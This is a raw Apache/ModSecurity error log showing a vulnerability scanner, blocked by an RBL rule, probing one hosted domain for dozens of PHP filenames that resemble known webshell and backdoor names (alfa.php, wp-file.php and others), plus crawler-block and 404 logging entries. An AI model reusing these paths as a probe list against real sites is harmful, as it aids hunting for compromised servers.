[Tue May 26 16:59:50.455727 2026] [security2:error] [pid 839808:tid 839956] [client 20.104.227.76:51240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-class.php"] [unique_id "ahWELpqtwAfohijxAqhtRwAAARo"]
[Tue May 26 16:59:50.455881 2026] [security2:error] [pid 839808:tid 839956] [client 20.104.227.76:51240] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-class.php"] [unique_id "ahWELpqtwAfohijxAqhtRwAAARo"]
[Tue May 26 16:59:50.701892 2026] [security2:error] [pid 839808:tid 839948] [client 20.104.227.76:50761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/8.php"] [unique_id "ahWELpqtwAfohijxAqhtTAAAARI"]
[Tue May 26 16:59:50.702023 2026] [security2:error] [pid 839808:tid 839948] [client 20.104.227.76:50761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/8.php"] [unique_id "ahWELpqtwAfohijxAqhtTAAAARI"]
[Tue May 26 16:59:50.774561 2026] [security2:error] [pid 839808:tid 839940] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWELZqtwAfohijxAqhtNQAAAQo"]
[Tue May 26 16:59:50.875090 2026] [security2:error] [pid 839808:tid 840037] [client 20.104.227.76:51261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/options.php"] [unique_id "ahWELpqtwAfohijxAqhtTgAAAWs"]
[Tue May 26 16:59:50.875203 2026] [security2:error] [pid 839808:tid 840037] [client 20.104.227.76:51261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/options.php"] [unique_id "ahWELpqtwAfohijxAqhtTgAAAWs"]
[Tue May 26 16:59:50.960172 2026] [security2:error] [pid 839808:tid 840004] [client 23.158.233.122:62834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWELpqtwAfohijxAqhtTQAAAUo"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:59:51.087047 2026] [security2:error] [pid 839808:tid 840055] [client 20.104.227.76:51325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/f5.php"] [unique_id "ahWEL5qtwAfohijxAqhtVAAAAX0"]
[Tue May 26 16:59:51.087180 2026] [security2:error] [pid 839808:tid 840055] [client 20.104.227.76:51325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/f5.php"] [unique_id "ahWEL5qtwAfohijxAqhtVAAAAX0"]
[Tue May 26 16:59:51.381195 2026] [security2:error] [pid 839808:tid 840066] [client 20.104.227.76:51774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/alpha.php"] [unique_id "ahWEL5qtwAfohijxAqhtWwAAAYg"]
[Tue May 26 16:59:51.381343 2026] [security2:error] [pid 839808:tid 840066] [client 20.104.227.76:51774] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/alpha.php"] [unique_id "ahWEL5qtwAfohijxAqhtWwAAAYg"]
[Tue May 26 16:59:51.538823 2026] [security2:error] [pid 839808:tid 839997] [client 20.104.227.76:51238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/son1.php"] [unique_id "ahWEL5qtwAfohijxAqhtXAAAAUM"]
[Tue May 26 16:59:51.538960 2026] [security2:error] [pid 839808:tid 839997] [client 20.104.227.76:51238] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/son1.php"] [unique_id "ahWEL5qtwAfohijxAqhtXAAAAUM"]
[Tue May 26 16:59:51.761662 2026] [security2:error] [pid 839808:tid 840022] [client 20.104.227.76:52242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ggb.php"] [unique_id "ahWEL5qtwAfohijxAqhtaAAAAVw"]
[Tue May 26 16:59:51.761759 2026] [security2:error] [pid 839808:tid 840022] [client 20.104.227.76:52242] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ggb.php"] [unique_id "ahWEL5qtwAfohijxAqhtaAAAAVw"]
[Tue May 26 16:59:52.068034 2026] [security2:error] [pid 839808:tid 840005] [client 20.104.227.76:51253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ss.php"] [unique_id "ahWEMJqtwAfohijxAqhtcwAAAUs"]
[Tue May 26 16:59:52.068142 2026] [security2:error] [pid 839808:tid 840005] [client 20.104.227.76:51253] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ss.php"] [unique_id "ahWEMJqtwAfohijxAqhtcwAAAUs"]
[Tue May 26 16:59:52.218563 2026] [security2:error] [pid 839808:tid 840028] [client 20.104.227.76:52328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/rh.php"] [unique_id "ahWEMJqtwAfohijxAqhtdwAAAWI"]
[Tue May 26 16:59:52.218675 2026] [security2:error] [pid 839808:tid 840028] [client 20.104.227.76:52328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/rh.php"] [unique_id "ahWEMJqtwAfohijxAqhtdwAAAWI"]
[Tue May 26 16:59:52.387395 2026] [security2:error] [pid 839808:tid 839952] [client 20.104.227.76:50737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/99.php"] [unique_id "ahWEMJqtwAfohijxAqhtfQAAARY"]
[Tue May 26 16:59:52.387528 2026] [security2:error] [pid 839808:tid 839952] [client 20.104.227.76:50737] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/99.php"] [unique_id "ahWEMJqtwAfohijxAqhtfQAAARY"]
[Tue May 26 16:59:52.634861 2026] [security2:error] [pid 839808:tid 840031] [client 20.104.227.76:51740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/layout.php"] [unique_id "ahWEMJqtwAfohijxAqhthQAAAWU"]
[Tue May 26 16:59:52.634965 2026] [security2:error] [pid 839808:tid 840031] [client 20.104.227.76:51740] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/layout.php"] [unique_id "ahWEMJqtwAfohijxAqhthQAAAWU"]
[Tue May 26 16:59:52.822095 2026] [security2:error] [pid 839808:tid 840043] [client 20.104.227.76:51313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/12.php"] [unique_id "ahWEMJqtwAfohijxAqhtiQAAAXE"]
[Tue May 26 16:59:52.822195 2026] [security2:error] [pid 839808:tid 840043] [client 20.104.227.76:51313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/12.php"] [unique_id "ahWEMJqtwAfohijxAqhtiQAAAXE"]
[Tue May 26 16:59:52.959856 2026] [security2:error] [pid 839808:tid 840054] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEL5qtwAfohijxAqhtZAAAAXw"]
[Tue May 26 16:59:53.012542 2026] [security2:error] [pid 839808:tid 840033] [client 20.104.227.76:52273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/fs.php"] [unique_id "ahWEMZqtwAfohijxAqhtjgAAAWc"]
[Tue May 26 16:59:53.012655 2026] [security2:error] [pid 839808:tid 840033] [client 20.104.227.76:52273] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/fs.php"] [unique_id "ahWEMZqtwAfohijxAqhtjgAAAWc"]
[Tue May 26 16:59:53.138418 2026] [autoindex:error] [pid 839808:tid 839986] [client 198.235.24.186:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:59:53.211068 2026] [security2:error] [pid 839808:tid 840022] [client 20.104.227.76:51300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/aaa.php"] [unique_id "ahWEMZqtwAfohijxAqhtmAAAAVw"]
[Tue May 26 16:59:53.211177 2026] [security2:error] [pid 839808:tid 840022] [client 20.104.227.76:51300] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/aaa.php"] [unique_id "ahWEMZqtwAfohijxAqhtmAAAAVw"]
[Tue May 26 16:59:53.639666 2026] [security2:error] [pid 839808:tid 839972] [client 20.104.227.76:51219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/Ov-Simple1.php"] [unique_id "ahWEMZqtwAfohijxAqhtogAAASo"]
[Tue May 26 16:59:53.639834 2026] [security2:error] [pid 839808:tid 839972] [client 20.104.227.76:51219] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/Ov-Simple1.php"] [unique_id "ahWEMZqtwAfohijxAqhtogAAASo"]
[Tue May 26 16:59:53.881964 2026] [security2:error] [pid 839808:tid 839979] [client 20.104.227.76:51305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/a5.php"] [unique_id "ahWEMZqtwAfohijxAqhtqQAAATE"]
[Tue May 26 16:59:53.882105 2026] [security2:error] [pid 839808:tid 839979] [client 20.104.227.76:51305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/a5.php"] [unique_id "ahWEMZqtwAfohijxAqhtqQAAATE"]
[Tue May 26 16:59:54.054601 2026] [security2:error] [pid 839808:tid 839941] [client 20.104.227.76:51231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/hplfuns.php"] [unique_id "ahWEMpqtwAfohijxAqhtqgAAAQs"]
[Tue May 26 16:59:54.054744 2026] [security2:error] [pid 839808:tid 839941] [client 20.104.227.76:51231] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/hplfuns.php"] [unique_id "ahWEMpqtwAfohijxAqhtqgAAAQs"]
[Tue May 26 16:59:54.327877 2026] [security2:error] [pid 839808:tid 839996] [client 20.104.227.76:51319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/bolt.php"] [unique_id "ahWEMpqtwAfohijxAqhttAAAAUI"]
[Tue May 26 16:59:54.328030 2026] [security2:error] [pid 839808:tid 839996] [client 20.104.227.76:51319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/bolt.php"] [unique_id "ahWEMpqtwAfohijxAqhttAAAAUI"]
[Tue May 26 16:59:54.410294 2026] [security2:error] [pid 839808:tid 840065] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEMZqtwAfohijxAqhtlgAAAYc"]
[Tue May 26 16:59:54.658373 2026] [security2:error] [pid 839808:tid 840023] [client 20.104.227.76:51278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/inputs.php"] [unique_id "ahWEMpqtwAfohijxAqhtuAAAAV0"]
[Tue May 26 16:59:54.658491 2026] [security2:error] [pid 839808:tid 840023] [client 20.104.227.76:51278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/inputs.php"] [unique_id "ahWEMpqtwAfohijxAqhtuAAAAV0"]
[Tue May 26 16:59:54.851310 2026] [security2:error] [pid 839808:tid 840048] [client 20.104.227.76:52287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/file2.php"] [unique_id "ahWEMpqtwAfohijxAqhtvAAAAXY"]
[Tue May 26 16:59:54.851461 2026] [security2:error] [pid 839808:tid 840048] [client 20.104.227.76:52287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/file2.php"] [unique_id "ahWEMpqtwAfohijxAqhtvAAAAXY"]
[Tue May 26 16:59:55.009753 2026] [security2:error] [pid 839808:tid 839997] [client 20.104.227.76:52351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/index/function.php"] [unique_id "ahWEM5qtwAfohijxAqhtwgAAAUM"]
[Tue May 26 16:59:55.009853 2026] [security2:error] [pid 839808:tid 839997] [client 20.104.227.76:52351] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/index/function.php"] [unique_id "ahWEM5qtwAfohijxAqhtwgAAAUM"]
[Tue May 26 16:59:55.243833 2026] [security2:error] [pid 839808:tid 839965] [client 20.104.227.76:50760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wk/index.php"] [unique_id "ahWEM5qtwAfohijxAqhtyQAAASM"]
[Tue May 26 16:59:55.243958 2026] [security2:error] [pid 839808:tid 839965] [client 20.104.227.76:50760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wk/index.php"] [unique_id "ahWEM5qtwAfohijxAqhtyQAAASM"]
[Tue May 26 16:59:55.252735 2026] [security2:error] [pid 839808:tid 839881] [remote 110.249.202.146:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahWEM5qtwAfohijxAqhtzAABD0Y"]
[Tue May 26 16:59:55.487929 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:50733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/alfa.php"] [unique_id "ahWEM5qtwAfohijxAqht0QAAATQ"]
[Tue May 26 16:59:55.488043 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:50733] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/alfa.php"] [unique_id "ahWEM5qtwAfohijxAqht0QAAATQ"]
[Tue May 26 16:59:55.766347 2026] [security2:error] [pid 839808:tid 840057] [client 20.104.227.76:50802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-theme.php"] [unique_id "ahWEM5qtwAfohijxAqht2AAAAX8"]
[Tue May 26 16:59:55.766492 2026] [security2:error] [pid 839808:tid 840057] [client 20.104.227.76:50802] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-theme.php"] [unique_id "ahWEM5qtwAfohijxAqht2AAAAX8"]
[Tue May 26 16:59:56.184290 2026] [security2:error] [pid 839808:tid 840013] [client 20.104.227.76:51279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-file.php"] [unique_id "ahWENJqtwAfohijxAqht6gAAAVM"]
[Tue May 26 16:59:56.184402 2026] [security2:error] [pid 839808:tid 840013] [client 20.104.227.76:51279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-file.php"] [unique_id "ahWENJqtwAfohijxAqht6gAAAVM"]
[Tue May 26 16:59:56.494916 2026] [security2:error] [pid 839808:tid 840025] [client 20.104.227.76:50792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/default.php"] [unique_id "ahWENJqtwAfohijxAqht8QAAAV8"]
[Tue May 26 16:59:56.495021 2026] [security2:error] [pid 839808:tid 840025] [client 20.104.227.76:50792] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/default.php"] [unique_id "ahWENJqtwAfohijxAqht8QAAAV8"]
[Tue May 26 16:59:56.707425 2026] [security2:error] [pid 839808:tid 840045] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEM5qtwAfohijxAqht1wAAAXM"]
[Tue May 26 16:59:56.785660 2026] [security2:error] [pid 839808:tid 840061] [client 20.104.227.76:50298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/mah.php"] [unique_id "ahWENJqtwAfohijxAqht9gAAAYM"]
[Tue May 26 16:59:56.785814 2026] [security2:error] [pid 839808:tid 840061] [client 20.104.227.76:50298] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/mah.php"] [unique_id "ahWENJqtwAfohijxAqht9gAAAYM"]
[Tue May 26 16:59:57.002120 2026] [security2:error] [pid 839808:tid 840036] [client 20.104.227.76:51260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/plugins.php"] [unique_id "ahWENZqtwAfohijxAqht-gAAAWo"]
[Tue May 26 16:59:57.002252 2026] [security2:error] [pid 839808:tid 840036] [client 20.104.227.76:51260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/plugins.php"] [unique_id "ahWENZqtwAfohijxAqht-gAAAWo"]
